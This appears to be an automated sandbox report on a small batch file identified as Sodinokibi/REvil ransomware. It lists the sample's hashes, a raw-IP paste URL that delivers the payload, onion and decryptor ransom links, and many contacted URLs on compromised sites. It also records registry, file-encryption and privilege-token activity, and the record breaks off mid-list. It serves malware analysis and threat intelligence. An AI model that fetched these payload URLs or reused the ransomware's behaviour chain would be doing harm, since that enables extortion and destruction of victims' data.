Analysis
-
max time kernel
141s -
max time network
141s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
04-05-2020 09:10
Static task
static1
Behavioral task
behavioral1
Sample
TG4Rrn07.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
TG4Rrn07.bat
Resource
win10v200430
General
-
Target
TG4Rrn07.bat
-
Size
196B
-
MD5
36415cbe52b3dbeb2af9a30c6815a0c5
-
SHA1
25d0489eedaaaef75455ece1a89485cca32a0a9c
-
SHA256
ce54af523565e53dcd1273a581513a9fec0bdaef947c269bb4cc8b6b2d70c201
-
SHA512
de5b0ee7eae56f9d6992c512f6a090941da641f6a7eb17ce46d4d743856d08de53886a72cda6ca87cd678aca2fe15b018093b297a0f35016370b90754bb26500
Malware Config
Extracted
http://185.103.242.78/pastes/TG4Rrn07
Extracted
C:\dc5v2ye0p9-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/038CBD1E4C6AA933
http://decryptor.cc/038CBD1E4C6AA933
Signatures
-
Makes http(s) request 30 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 15 https://ausbeverage.com.au/wp-content/tmp/ouws.png HTTP URL 55 https://sterlingessay.com/data/image/kjxtiiel.jpg HTTP URL 129 https://igorbarbosa.com/admin/assets/nrntrazg.png HTTP URL 32 http://x.ss2.us/x.cer HTTP URL 75 https://bargningharnosand.se/content/images/xdkg.png HTTP URL 153 https://woodleyacademy.org/content/pics/mxlpmrrwux.png HTTP URL 1 http://185.103.242.78/pastes/TG4Rrn07 HTTP URL 94 https://americafirstcommittee.org/wp-content/images/fjjyihhh.gif HTTP URL 100 https://withahmed.com/admin/temp/lespfn.gif HTTP URL 155 https://jobcenterkenya.com/uploads/graphic/oeso.png HTTP URL 45 https://www.xlarge.at/data/assets/annafzja.gif HTTP URL 123 https://readberserk.com/news/game/imbpqk.png HTTP URL 25 https://schoolofpassivewealth.com/include/assets/ee.jpg HTTP URL 30 https://grelot-home.com/include/graphic/sympzr.jpg HTTP URL 35 https://www.grelot-home.com/ HTTP URL 10 http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt HTTP URL 33 https://grelot-home.com/ HTTP URL 96 https://theapifactory.com/news/pics/hcxz.gif HTTP URL 117 https://dontpassthepepper.com/wp-content/image/ktcorauzmr.jpg HTTP URL 41 https://xlarge.at/data/assets/annafzja.gif HTTP URL 77 https://beaconhealthsystem.org/uploads/tmp/baondjto.jpg HTTP URL 79 https://www.beaconhealthsystem.org/ HTTP URL 90 https://cerebralforce.net/include/assets/mexacuokgxsrml.png HTTP URL 156 https://jobcenterkenya.com/ HTTP URL 151 http://crt.comodoca.com/COMODORSAAddTrustCA.crt HTTP URL 106 https://bargningavesta.se/wp-content/pictures/trsykcwecebs.png HTTP URL 127 https://miraclediet.fun/news/pics/gqix.png HTTP URL 8 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP URL 73 https://thaysa.com/wp-content/assets/jq.png HTTP URL 43 http://apps.identrust.com/roots/dstrootcax3.p7c -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1052 powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a919000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c02000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000002000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877619000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe -
Drops desktop.ini file(s) 74 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\links\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\searches\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\favorites\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows\burn\burn\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows\temporary internet files\content.ie5\557lh6z9\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows\temporary internet files\content.ie5\xgj27kx4\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\Desktop.ini powershell.exe File opened for modification \??\c:\users\admin\favorites\links\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows\temporary internet files\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\music\desktop.ini powershell.exe File opened for modification \??\c:\programdata\microsoft\windows\start menu\programs\games\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows\temporary internet files\content.ie5\desktop.ini powershell.exe File opened for modification \??\c:\programdata\microsoft\windows\start menu\programs\desktop.ini powershell.exe File opened for modification \??\c:\users\public\pictures\sample pictures\desktop.ini powershell.exe File opened for modification \??\c:\$recycle.bin\s-1-5-21-910373003-3952921535-3480519689-1000\desktop.ini powershell.exe File opened for modification \??\c:\users\public\music\desktop.ini powershell.exe File opened for modification \??\c:\users\public\videos\sample videos\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\feeds cache\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\sendto\Desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\desktop.ini powershell.exe File opened for modification \??\c:\program files\desktop.ini powershell.exe File opened for modification \??\c:\users\public\pictures\desktop.ini powershell.exe File opened for modification \??\c:\programdata\microsoft\windows\start menu\programs\administrative tools\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows mail\stationery\Desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows\history\history.ie5\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\desktop.ini powershell.exe File opened for modification \??\c:\users\public\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\desktop.ini powershell.exe File opened for modification \??\c:\programdata\microsoft\windows\start menu\programs\startup\desktop.ini powershell.exe File opened for modification \??\c:\users\public\recorded tv\sample media\desktop.ini powershell.exe File opened for modification \??\c:\programdata\microsoft\windows\start menu\programs\accessories\system tools\Desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\accessories\Desktop.ini powershell.exe File opened for modification \??\c:\users\public\libraries\desktop.ini powershell.exe File opened for modification \??\c:\users\default\appdata\roaming\microsoft\windows\sendto\Desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\maintenance\Desktop.ini powershell.exe File opened for modification \??\c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\maintenance\Desktop.ini powershell.exe File opened for modification \??\c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\Desktop.ini powershell.exe File opened for modification \??\c:\programdata\microsoft\windows\ringtones\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\pictures\desktop.ini powershell.exe File opened for modification \??\c:\users\public\recorded tv\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\feeds cache\zdaw0i3y\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\libraries\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\recent\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\Desktop.ini powershell.exe File opened for modification \??\c:\program files (x86)\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\favorites\links for united states\desktop.ini powershell.exe File opened for modification \??\c:\users\public\music\sample music\desktop.ini powershell.exe File opened for modification \??\c:\programdata\microsoft\windows\start menu\programs\accessories\accessibility\Desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows\temporary internet files\content.ie5\1iggbw8z\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows\temporary internet files\content.ie5\ot4yd26o\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\desktop\desktop.ini powershell.exe File opened for modification \??\c:\programdata\microsoft\windows\start menu\programs\accessories\windows powershell\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\feeds cache\iqd6dikv\desktop.ini powershell.exe File opened for modification \??\c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\Desktop.ini powershell.exe File opened for modification \??\c:\users\admin\saved games\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\downloads\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\videos\desktop.ini powershell.exe File opened for modification \??\c:\programdata\microsoft\windows\start menu\programs\maintenance\Desktop.ini powershell.exe File opened for modification \??\c:\programdata\microsoft\windows\start menu\programs\accessories\tablet pc\Desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\feeds cache\5q8aamsb\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\feeds cache\lubvl9mg\desktop.ini powershell.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows\history\desktop.ini powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 88 IoCs
Processes:
powershell.exeflow pid process 1 1052 powershell.exe 6 1052 powershell.exe 8 1052 powershell.exe 10 1052 powershell.exe 12 1052 powershell.exe 13 1052 powershell.exe 15 1052 powershell.exe 17 1052 powershell.exe 18 1052 powershell.exe 20 1052 powershell.exe 21 1052 powershell.exe 23 1052 powershell.exe 25 1052 powershell.exe 27 1052 powershell.exe 28 1052 powershell.exe 30 1052 powershell.exe 32 1052 powershell.exe 33 1052 powershell.exe 35 1052 powershell.exe 37 1052 powershell.exe 39 1052 powershell.exe 41 1052 powershell.exe 43 1052 powershell.exe 45 1052 powershell.exe 47 1052 powershell.exe 49 1052 powershell.exe 50 1052 powershell.exe 55 1052 powershell.exe 57 1052 powershell.exe 58 1052 powershell.exe 60 1052 powershell.exe 61 1052 powershell.exe 63 1052 powershell.exe 64 1052 powershell.exe 66 1052 powershell.exe 67 1052 powershell.exe 69 1052 powershell.exe 71 1052 powershell.exe 73 1052 powershell.exe 75 1052 powershell.exe 77 1052 powershell.exe 79 1052 powershell.exe 81 1052 powershell.exe 82 1052 powershell.exe 84 1052 powershell.exe 85 1052 powershell.exe 87 1052 powershell.exe 88 1052 powershell.exe 90 1052 powershell.exe 92 1052 powershell.exe 94 1052 powershell.exe 96 1052 powershell.exe 98 1052 powershell.exe 100 1052 powershell.exe 102 1052 powershell.exe 104 1052 powershell.exe 106 1052 powershell.exe 108 1052 powershell.exe 110 1052 powershell.exe 112 1052 powershell.exe 113 1052 powershell.exe 115 1052 powershell.exe 117 1052 powershell.exe 120 1052 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 272 wrote to memory of 1052 272 cmd.exe powershell.exe PID 1052 wrote to memory of 1772 1052 powershell.exe powershell.exe PID 1052 wrote to memory of 1772 1052 powershell.exe powershell.exe PID 1052 wrote to memory of 1772 1052 powershell.exe powershell.exe PID 1052 wrote to memory of 1772 1052 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exepowershell.exevssvc.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 1772 powershell.exe Token: SeBackupPrivilege 1848 vssvc.exe Token: SeRestorePrivilege 1848 vssvc.exe Token: SeAuditPrivilege 1848 vssvc.exe Token: SeTakeOwnershipPrivilege 1052 powershell.exe Token: SeDebugPrivilege 1332 WerFault.exe -
Enumerates connected drives 3 TTPs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops startup file 3 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\users\admin\appdata\roaming\microsoft\word\startup\dc5v2ye0p9-readme.txt powershell.exe File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\dc5v2ye0p9-readme.txt powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\duad2hg0hl5.bmp" powershell.exe -
Drops file in Program Files directory 38 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ReceiveUnregister.rle powershell.exe File opened for modification \??\c:\program files\SendHide.ini powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceca35.dll powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceer35EN.dll powershell.exe File opened for modification \??\c:\program files\GetPop.zip powershell.exe File opened for modification \??\c:\program files\InvokeLock.mhtml powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlcecompact35.dll powershell.exe File opened for modification \??\c:\program files\MergeSwitch.mpe powershell.exe File opened for modification \??\c:\program files\ProtectDismount.3gp powershell.exe File opened for modification \??\c:\program files\ResolveComplete.otf powershell.exe File opened for modification \??\c:\program files\ShowSearch.xps powershell.exe File opened for modification \??\c:\program files\UnblockMerge.xps powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceqp35.dll powershell.exe File created \??\c:\program files (x86)\dc5v2ye0p9-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointAssert.xlsx 